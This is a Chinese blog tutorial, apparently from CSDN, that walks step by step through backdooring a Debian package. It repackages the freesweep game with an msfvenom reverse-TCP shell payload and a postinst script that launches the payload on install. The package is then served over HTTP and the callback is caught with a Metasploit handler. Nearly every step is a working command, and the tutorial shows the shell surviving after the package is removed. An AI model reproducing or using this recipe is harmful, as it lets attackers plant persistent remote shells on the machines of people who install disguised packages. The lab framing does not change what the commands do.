使用MSF-msfvenom制作恶意 deb 软件包来触发后门

最新推荐文章于 2023-04-04 00:08:35 发布
最新推荐文章于 2023-04-04 00:08:35 发布
阅读量544 收藏 3
点赞数 2
分类专栏: 网络安全工具 文章标签: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fengzilin1973/article/details/115967623
版权

使用MSF-msfvenom制作恶意 deb 软件包来触发后门

文章目录


实验环境

  • Kali Linux 2019.1a
  • Kali Linux 2020.4

1.制作恶意软件包

制作恶意软件包使用 --download-only 方式下载软件包不进行安装

注:freeweep

root@fengzilin53:~# apt --download-only install -y freesweep

image-20210221144014677

root@fengzilin53:~# mv /var/cache/apt/archives/freesweep_1.0.1-2_amd64.deb /root  //将freesweep 移动到 /root下
root@fengzilin53:~# dpkg -x freesweep_1.0.1-2_amd64.deb free    //解压到 free目录

image-20210221144358232

root@fengzilin53:~# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.37.138 LPORT=4444 -b "\x00" -i 10 -f elf -o /root/free/usr/games/freesweep_sources

image-20210221161039717

扩展:生成软件包时无论时 payload 的和软件包信息都需要选择能够在目标操作系统上执行的,创建软件包信息目录

root@fengzilin53:~# mkdir free/DEBIAN && cd free/DEBIAN
root@fengzilin53:~/free/DEBIAN# tee /root/free/DEBIAN/control <<'EOF'
Package: freesweep 
Version: 1.0.1-1 
Section: Games and Amusement 
Priority: optional 
Architecture: amd64 
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com) 
Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where  one tries to find all the mines without igniting any, based on hints given  by the computer. Unlike most implementations of this game, Freesweep  works in any visual text display - in Linux console, in an xterm, and in  most text-based terminals currently in use. 
EOF

image-20210221145430405

创建 deb 软件包 ,安装 后脚本文件,来加载 后门

root@fengzilin53:~# tee /root/free/DEBIAN/postinst <<'EOF'
#!/bin/bash 
sudo chmod 2755 /usr/games/freesweep_sources 
sudo /usr/games/freesweep_sources &
EOF

sudo /usr/games/freesweep_sources & 是我们要执行的恶意代码 &是将命令放到后台运行

image-20210221150233099

给脚本添加执行权限,并构建新的deb 安装包

root@fengzilin53:~# cd
root@fengzilin53:~# chmod 755 /root/free/DEBIAN/postinst 
root@fengzilin53:~# dpkg-deb --build /root/free/
root@fengzilin53:~# ls free.deb

image-20210221151240419

新打开一个终端 生成 MSF监听

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp 
msf5 exploit(multi/handler) > set LHOST 192.168.37.138
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > run

image-20210221151851958

将deb 包拷贝到网站根目录下

root@fengzilin53:~# cp /root/free.deb /var/www/html/

image-20210221152018830

打开 kali Linux 2020.4 下载deb 包root

└─# wget http://192.168.37.138/free.deb

image-20210221152156988

安装 free.deb 包

└─# dpkg -i free.deb

image-20210221161708367

返回kali 终端 发现已经获取shell

image-20210221161743591

kali 2020.4 卸载 payload的依旧正常运行

dpkg -r freesweep

image-20210221161824831

pwd

image-20210221161858733

丰梓林
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
制作恶意软件并且绕过防御软件
qq_45906009的博客
06-25 505
哈哈哈哈哈哈 不行 我有点兴奋 今天成功的写了一个恶意文件 (木马病毒) 话不多说 直接开始写 首先贴几个用来测试木马是是否能过安全狗的网站 各大AV尝试库 https://www.virustotal.com https://www.virscan.org 这个地下的杀毒 https://nodistribute.com/ 下面正式开始 msfvenom 是msfpayload msfencode 结合体 生成加密shell 首先制作一个简单的 msfvenom -a x86 --platform w
msf-with-rubymine:如何使用Ruby开发metasploit模块
04-10
msf-with-rubymine 如何在RubyMine中使用metasploit1.设置您的开发环境在第一步中安装软件包: : 2.在〜/ .msf4中添加一个Gemfile: # ~/.msf4/Gemfilesource 'https://rubygems.org'gem 'metasploit-framework', ...
制作恶意deb软件包linux系统触发后门
xiao_he0123的博客
02-27 2153
文章目录前言一、kali二、操作步骤1.下载一个正常的软件包2.将软件包转移到root目录下3.将安装包解压到root目录中解压为free(文件名)4.制作后门放入free文件中三.总结 前言 通过kali系统中的msf在软件包中植入后门制作deb恶意软件包对linux系统进行shell获取 提示:以下是本篇文章正文内容,下面案例可供参考 一、kali 示例:Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.用户
msf制作恶意deb软件包触发后门
Deeeelete的博客
02-25 990
攻击机:192.168.132.144(kali1) 手害机:192.168.132.133(kali2) 本该是由攻击机生成恶意deb包,然后把包发给受害机让它访问然后监听的,但因为中间有一个包传递的过程,我就直接省略这一步直接在受害机里生成了,但监听地址是填写的攻击机。 1.第一步我们先下载所需的freesweep软件包(这里使用的是kali2) apt --download-only in...
无聊做的一个小恶意程序(仅linux上)
lan_777的博客
04-17 511
无聊做了一个孤儿进程,会不断在本目录创建文件,父进程很快结束。 解决,找到进程,kill它就好了。进程名字是编译后的可执行文件名。#include<stdio.h> #include<unistd.h> int main() { FILE *fp; int pid; int i=1; char s[100]; pid=fork(); if(pid==
制作windows客户端恶意软件进行渗透
m0_56988395的博客
02-20 998
目录 工具 靶机 客户端渗透原理 制作Windows恶意软件获取shell 工具 Metasploit 靶机 windows 2008 r2 相信大多数网友都是下载的虚拟机,所以请设置成桥接模式,确保位于同一网段 注:以下内容仅供学习交流,请勿用于非法用途 客户端渗透原理 在我们无法突破对方的网络边界时,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档,pdf文件。想要达到效果同时也要利用好社会工程学,来诱惑受害
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_
09-30
"rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_"这个标题暗示了我们正在讨论一个与RTK相关的ROS(Robot Operating System)驱动程序,它可能涉及到了一些关键组件和技术。 首先,"RTK"是Real-Time Kinematic的...
php-msf-docs:PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual
04-29
本手册从介绍异步、并行、协程等基础概念出发,再到框架如何使用,其中也介绍了部分内部实现的原理,简单易上手。通过学习本手册,再结合我们的demo示例项目,就能够使用构建大规模高性能的微服务化分布式系统。 __...
php-msf-demo
04-29
PHP-MSF DEMOPHP微服务框架即“”示例项目How to ...php server.phpNoticephp-msf-demo示例项目使用的是最新的代码,即dev-master分支,生产环境请使用release的相关版本。在有些环境中执行php server.php,由于inot
ADGG-LSF-MSF-v1.0:ADGG-LSF-MSF-v1.0
02-18
建立React材料UI Redux 草稿JS ChartJS 棱镜JS React降价React完整日历快速开始安装依赖项: npm install或yarn 启动服务器: npm run start或yarn start 视图处于打开状态: localhost:3000 推荐最新的...LSF-MSF-v1.0
2022-渗透测试-制作恶意deb软件包触发后门
保持微笑的博客
01-19 2169
目录 1.下载软件包 2.解压软件包 小知识1:kali更新或安装包的目录 小知识2:kali解压或安装操作 3.生成恶意代码到软件包源文件中 4.创建软件包信息目录 5.重新生成一个软件包 6 将deb提供下载 7 启动msfconsole 8.配置监听 10 目标机下载并安装带木马的deb软件 11.目标机安装软件 12 监控端获取到session 1.下载软件包 kali安装软件包 apt install 软件名称 kali下载软件包 apt --down..
Msfvenom制作deb软件包生成后门
Dreamsi_zhang的博客
08-13 644
一、下载正常软件包 apt --download-only install freesweep //下载但不安装软件包freesweep 二、复制到root用户加目录下 为了便于后续操作,复制该软件包到root用户加目录下 默认apt下载后软件包位置路径为:/var/cache/apt/archives/ 四、解压软件包deb包解压 五、生成恶意代码到软件源文件中 msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tc
打造自己的Ubuntu渗透利器--msf、nessus安装
热门推荐
12306小哥
10-27 2万+
1.1 msf安装 msf在Ubuntu安装,打开Ubuntu下的命令行终端。建议在root权限下执行。 $sudo–i 1.打开终端,进入安装目录(安装目录不固定,个人意愿) $cd/opt 2.执行以下命令: $curlhttps://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/te
运行安卓程序提示the selected device is incompatible
alex19900的专栏
09-04 1679
在android studio运行 程序时提示the selected device is incompatible(选择的设备不兼容) 以下有两种方法可解决: 在Gradle Scripts--->build.gradle--->把minSdkVersion 改为与当前模拟器或测试手机 相同版本。 2)新建项目时,Minimuk SDK选择与测试设备相同版本即可。
关于msfvenom报错问题
qq_41453632的博客
10-28 2225
使用msfvenom相关命令时出现了各种报错,尤其在指定x86/shikata_ga_nai 编码时报错严重,现在终于可以手工解决了,解决方法就是升级kali下的ruby文件,命令也很简单: apt-get  upgrade ruby apt-get    autoremove...
零基础Web安全渗透工程师精品就业班
07-14
1、熟练掌握Kali操作系统的使用2、熟练掌握metasploit框架进行渗透测试3、熟练掌握SQL注入的原理以及绕过技巧。4、每章节课时都有2小时,建议每天学习1章节,然后充分练习、实践、总结。
【木马生成工具】Msfvenom介绍及利用
Sagittarius32的博客
07-14 4724
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。...
KaLi做木马渗透实战案例
开摆工作室(kbai.cc)
04-04 4765
KaLi做木马渗透实战案例
AndroidStudio选择自带模拟器运行时,报错,错误为the selected device is incompatible
向来萧瑟也无畏
03-19 1857
说明:本文仅用于记录。     报错     解决 注意下图中有三步(按从左到右的顺序):双击打开Gradle Scripts下的build.gradle→修改defaultConfig下的minSdkVersion的数值(这里我从15改成了21)→点击右上角的Sync Now     改完之后就可以运行了(如果不行,可以rebuild...
如何使用kali的msf制作木马
最新发布
06-10
我很抱歉,我不能回答如何使用Kali的Metasploit Framework(MSF)制作木马的问题,因为这涉及到违法和不道德的行为。MSF是一个用于漏洞测试和渗透测试的工具,但其目的是帮助安全专业人员和网络管理员保护网络安全,而不是破坏网络安全。在任何情况下,不要试图使用Kali或任何其他工具来制作或传播恶意软件,否则你可能会面临法律责任。请遵守相关法规和道德规范,使用工具来促进网络安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值